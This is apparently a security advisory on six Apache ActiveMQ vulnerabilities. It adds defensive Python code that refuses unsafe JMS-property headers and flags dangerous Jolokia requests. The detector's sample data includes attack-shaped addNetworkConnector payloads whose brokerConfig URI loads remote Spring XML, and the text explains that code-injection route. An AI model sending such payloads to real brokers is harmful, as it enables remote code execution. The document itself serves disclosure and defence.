SB2026060499 - Multiple vulnerabilities in ActiveMQ



Published: June 4, 2026

Security Bulletin ID: SB2026060499
CSH Severity: Medium
Patch available: Yes
Number of vulnerabilities: 6
Exploitation vector: Remote access
Highest impact: Code execution

Breakdown by Severity

Medium: 67% (4 of 6)
Low: 33% (2 of 6)

Description

This security bulletin contains information about 6 vulnerabilities.


1) Improper access control (CVE-ID: CVE-2026-49157)

CWE-ID: CWE-284 - Improper Access Control

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/U:Clear


The vulnerability allows a remote user to perform broker management operations.

The vulnerability exists because the Jolokia authorization settings grant any account that can log in to the web console access to Jolokia operations, rather than restricting them to administrators. A remote user with such a login can invoke administrative broker management operations such as addQueue and removeQueue and so create or remove destinations on the broker.


2) Improper access control (CVE-ID: CVE-2026-49270)

CWE-ID: CWE-284 - Improper Access Control

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Green


The vulnerability allows a remote attacker to disclose sensitive information.

The vulnerability exists due to improper access control in the OpenWire BrokerInfo handling. When a broker has a network connector configured with syncDurableSubs set to true, it answers a BrokerInfo command with durable subscription metadata without requiring authentication. A remote attacker who can reach the OpenWire transport can send a crafted BrokerInfo command and obtain durable topic subscription details: client identifiers, subscription names, topic destinations and JMS selector expressions.


3) Cross-site scripting (CVE-ID: CVE-2026-42253)

CWE-ID: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/U:Green


The vulnerability allows a remote attacker to inject or overwrite HTTP response headers.

The vulnerability exists due to improper neutralization of input in the MessageServlet of the ActiveMQ web console API, which copies the JMS message properties of the messages it returns into HTTP response headers without validating the property names or values. A remote attacker who can place a message with crafted properties on a destination can therefore add headers to, or overwrite headers in, the response served to whoever retrieves that message through the servlet.

Although the issue is classified as cross-site scripting (CWE-79), the impact described is HTTP response header injection; it affects only messages returned by the servlet.
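A hardened version of the property-to-header copy described above, as an added example that is not part of this bulletin and not ActiveMQ's own MessageServlet code. It refuses a property if its name is not a valid header token, if it would overwrite a header the server controls, or if its value contains CR, LF or NUL (the characters that terminate one header and start an injected one). The reserved-header list and the sample message properties are constructed for the illustration.

```python
"""Copy JMS message properties into HTTP response headers only when they cannot
add or overwrite a header the server controls. Illustration of the hardened
check for the MessageServlet issue; not ActiveMQ code."""
import re

# RFC 7230 token characters: the only characters allowed in a header name.
_TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

# Headers the servlet itself sets, or that change how the client treats the
# response; a message property must never be allowed to replace them.
# Assumption: this list is illustrative and not taken from ActiveMQ.
RESERVED_HEADERS = {
    "content-type", "content-length", "transfer-encoding", "connection",
    "set-cookie", "location", "cache-control", "access-control-allow-origin",
}


def copy_properties_to_headers(properties):
    """Return (headers, rejected): the headers that are safe to emit and the
    (property name, reason) pairs that were refused."""
    headers, rejected = {}, []
    for name, value in properties.items():
        value = str(value)
        if not _TOKEN_RE.match(name):
            rejected.append((name, "header name is not an RFC 7230 token"))
        elif name.lower() in RESERVED_HEADERS:
            rejected.append((name, "would overwrite a server-controlled header"))
        elif any(ch in value for ch in "\r\n\0"):
            # CR/LF would end this header and start an attacker-chosen one.
            rejected.append((name, "value contains a control character"))
        else:
            headers[name] = value
    return headers, rejected


# Constructed sample: one benign property, one named after a reserved header,
# and one whose value carries a CRLF header-injection payload.
SAMPLE_PROPERTIES = {
    "traceId": "abc123",
    "Set-Cookie": "session=attacker",
    "foo": "bar\r\nX-Injected: 1",
}

if __name__ == "__main__":
    safe, refused = copy_properties_to_headers(SAMPLE_PROPERTIES)
    print("emit:", safe)
    for name, reason in refused:
        print("refuse:", name, "-", reason)
```

Rejecting rather than sanitizing (for example stripping the CRLF) is deliberate: a property that needs cleaning is already evidence of tampering, and silently emitting a modified value hides that from the operator.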


4) Code Injection (CVE-ID: CVE-2026-42588)

CWE-ID: CWE-94 - Improper Control of Generation of Code ('Code Injection')

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/U:Green


The vulnerability allows a remote user to execute arbitrary code.

The vulnerability exists because the addNetworkConnector operation exposed through the Jolokia JMX-HTTP bridge at /api/jolokia/ does not validate the discovery URI it is given. A remote user with access to the bridge can invoke BrokerService.addNetworkConnector(String) with a "masterslave://" discovery URI that wraps a VM transport whose brokerConfig parameter names a Spring XML application context; the broker loads that context when it creates the connector, which executes code of the attacker's choosing in the broker process. User interaction is not required.


5) Code Injection (CVE-ID: CVE-2026-45505)

CWE-ID: CWE-94 - Improper Control of Generation of Code ('Code Injection')

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/U:Green


The vulnerability allows a remote user to execute arbitrary code.

The vulnerability exists due to improper input validation and code injection in the Jolokia JMX-HTTP bridge and the BrokerService.addNetworkConnector(String) and addConnector(String) operations when handling crafted discovery URIs sent through the /api/jolokia/ web console endpoint. The existing validation does not cover non-parenthesized discovery wrappers such as masterslave:vm://...,... and static:vm://..., so a remote user with access to the endpoint can pass such a URI and have the VM transport's brokerConfig parameter load a remote Spring XML application context via ResourceXmlApplicationContext before configuration validation completes, executing arbitrary code in the broker process.
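The discovery URI check that issues 4 and 5 describe, as an added example that is not part of this bulletin and not ActiveMQ's own code. It inspects a Jolokia POST body (Jolokia's JSON request shape: type, mbean, operation, arguments), unwraps masterslave: and static: wrappers in both the parenthesized form and the bare comma-separated form that issue 5 says bypassed the earlier validation, and flags every vm: leaf that carries a brokerConfig option. The sample requests, MBean names, hosts (192.0.2.0/24) and file paths are constructed; the set of wrapper schemes is an assumption limited to the two the bulletin names and is not exhaustive. The same logic can be run over a proxy or web console request capture to find attempts before the update is deployed.

```python
"""Flag Jolokia exec requests whose connector URI would make the VM transport
load a brokerConfig (Spring XML) context, including when the vm: leaf is hidden
inside a discovery wrapper written with or without parentheses."""
import re
from urllib.parse import parse_qs, urlsplit

# Broker MBean operations reachable over /api/jolokia/ that accept a connector
# or discovery URI (the two named in the bulletin).
WATCHED_OPERATIONS = {"addNetworkConnector", "addConnector"}

# Discovery wrapper schemes named in the bulletin. Assumption: a real deployment
# may need more entries; this set is not exhaustive.
WRAPPER_SCHEMES = {"masterslave", "static"}

# The transport whose brokerConfig option loads a Spring XML context.
RISKY_TRANSPORT = "vm"
RISKY_OPTION = "brokerconfig"

_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):(.*)$", re.S)


def _split_top_level(text):
    """Split on commas that are not nested inside parentheses."""
    parts, depth, start = [], 0, 0
    for i, ch in enumerate(text):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            parts.append(text[start:i])
            start = i + 1
    parts.append(text[start:])
    return [p.strip() for p in parts if p.strip()]


def _matching_paren(text):
    """Index of the ')' closing the '(' at text[0], or -1 if unbalanced."""
    depth = 0
    for i, ch in enumerate(text):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return i
    return -1


def unwrap_uri(uri):
    """Return the leaf transport URIs inside a possibly wrapped composite URI.

    Handles the parenthesized form   static:(vm://a,tcp://b)?opt=1
    and the bare form                masterslave:vm://a,tcp://b
    identically, so a wrapper cannot hide the vm: leaf from the check.
    """
    uri = uri.strip()
    match = _SCHEME_RE.match(uri)
    if not match or match.group(1).lower() not in WRAPPER_SCHEMES:
        return [uri]
    rest = match.group(2)
    if rest.startswith("("):
        close = _matching_paren(rest)
        inner = rest[1:close] if close > 0 else rest[1:]  # drop ?options after ')'
    else:
        inner = rest  # non-parenthesized wrapper: the whole remainder is the list
    leaves = []
    for part in _split_top_level(inner):
        leaves.extend(unwrap_uri(part))
    return leaves


def risky_leaves(uri):
    """Return (leaf_uri, brokerConfig value) for each vm: leaf that sets brokerConfig."""
    hits = []
    for leaf in unwrap_uri(uri):
        parts = urlsplit(leaf)
        if parts.scheme.lower() != RISKY_TRANSPORT:
            continue
        for key, values in parse_qs(parts.query, keep_blank_values=True).items():
            if key.lower() == RISKY_OPTION:
                hits.append((leaf, values[0]))
    return hits


def inspect_jolokia_request(body):
    """Scan a Jolokia POST body (single request dict or batch list) for watched
    exec operations whose arguments carry a vm: brokerConfig leaf."""
    requests = body if isinstance(body, list) else [body]
    findings = []
    for req in requests:
        if req.get("type") != "exec" or req.get("operation") not in WATCHED_OPERATIONS:
            continue
        for arg in req.get("arguments", []):
            if not isinstance(arg, str):
                continue
            for leaf, cfg in risky_leaves(arg):
                findings.append({"mbean": req.get("mbean"), "operation": req["operation"],
                                 "leaf": leaf, "brokerConfig": cfg})
    return findings


# Constructed sample batch: a bare masterslave: wrapper, a parenthesized static:
# wrapper with the vm: leaf second in the list, a benign static: connector and
# an unrelated attribute read. Only the first two should be flagged.
_BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
SAMPLE_BATCH = [
    {"type": "exec", "mbean": _BROKER, "operation": "addNetworkConnector",
     "arguments": ["masterslave:vm://remote?brokerConfig=xbean:http://192.0.2.10/cfg.xml"]},
    {"type": "exec", "mbean": _BROKER, "operation": "addConnector",
     "arguments": ["static:(tcp://10.0.0.5:61616,vm://x?brokerConfig=xbean:file:/tmp/x.xml)"]},
    {"type": "exec", "mbean": _BROKER, "operation": "addNetworkConnector",
     "arguments": ["static:(tcp://10.0.0.5:61616)"]},
    {"type": "read", "mbean": _BROKER, "attribute": "TotalEnqueueCount"},
]

if __name__ == "__main__":
    for finding in inspect_jolokia_request(SAMPLE_BATCH):
        print(finding)
```

Jolokia's GET form carries the same fields in the URL path (exec/<mbean>/<operation>/<arguments>); decode those segments into the same dict shape before calling inspect_jolokia_request. The design point is in unwrap_uri: a wrapper without parentheses is treated exactly like one with them, which is the case the earlier validation missed according to issue 5.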


6) Improper access control (CVE-ID: CVE-2026-46605)

CWE-ID: CWE-284 - Improper Access Control

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/U:Clear


The vulnerability allows a remote user to remove existing destinations.

The vulnerability exists because the destination removal functionality in the Apache ActiveMQ server accepts an authenticated destination removal request without checking that the requester is authorized to remove that destination. A remote authenticated user who lacks the corresponding administrative authorization can send a destination removal request and delete existing destinations.


Remediation

Install the update from the vendor's website. Issues 1, 3, 4 and 5 are reached through the web console, including its /api/jolokia/ endpoint, and issue 2 through the OpenWire transport, so limiting access to those interfaces to trusted networks and accounts reduces exposure until the update is applied.